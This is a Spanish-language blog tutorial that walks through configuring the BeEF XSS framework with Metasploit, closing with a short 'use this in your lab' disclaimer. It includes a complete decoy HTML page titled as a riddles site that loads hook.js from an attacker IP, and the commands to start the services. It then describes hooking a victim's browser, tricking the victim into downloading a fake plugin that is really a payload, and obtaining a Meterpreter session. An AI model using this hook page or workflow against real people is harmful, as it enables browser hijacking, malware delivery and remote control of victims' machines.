Beef es un framework que nos permite
inyecciones XSS, las cuales nos indica la IP, nos da las
características del equipo, lanzar exploits, etc.
En primer lugar, hay que cofigurarlo:
editamos
/usr/share/beef-xss/config.yaml
En metasploit ponemos
enable: true
En evasion ponemos
enable: true
Guardamos y salimos.
Creamos un archivo beef.rc que
contiene:
load msgrpc ServerHost=IPLOCAL
Pass=abc123 (o si habéis cambiado la pass, la que sea).
Msgrpc es un servicio de Metasploit que
le permite conectarse a aplicaciones externas.
Guardamos
Ahora editamos
/usr/share/beef-xss/extensions/metasploit/config.yaml
En la parte de metasploit, en host,
cambiamos 127.0.0.1 por la IP local.
En callback_host, cambiamos 127.0.0.1
por la IP local.
Beef tiene una página web por defecto,
pero nosotros vamos a crear una:
<!doctype html> <HTML lang=es> <head> <title>Los Mejores acertijos</title> </head> <script src="http://192.168.1.134:3000/hook.js"type="text/javascript"</javascript> <script> var commandModuleStr='script src="'+window.location.protocol+'//'+window.location.host+'hook.js" type="text/javascript"><\/script>';document.write(commandModuleStr); </script> <body> <br> Has sido hackeado, te fastidias <br> </body> </html>
La guardaremos e iniciaremos apache
service apache2 start
En el directorio /usr/share/beef-xss,
ponemos
msfconsole -r beef.rc
Y en otra consola
./beef
Abrimos el navegador y ponemos la
dirección:
username: beef
password: beef
Cuando la víctima pone:
Y nosotros ya lo tenemos como zombie:
Por ejemplo, podemos hacerle tragar un
payload con la opción:
La víctima recibirá un mensaje en la que se le dice que tiene que descargar un pluggin, y, en realidad, será un payload que hemos creado. Ambas cosas las tendremos que configurar y darle al botón de ejecutar.
A la víctima le sale:
Y al ejectuarlo, ya tenemos nuestra
sesión de meterpreter:
Otro día echaremos un vistazo a más
cosas que se pueden hacer.
Recordad: Usad esto en vuestro
laboratorio, sed, legales.
No hay comentarios:
Publicar un comentario
Nota: solo los miembros de este blog pueden publicar comentarios.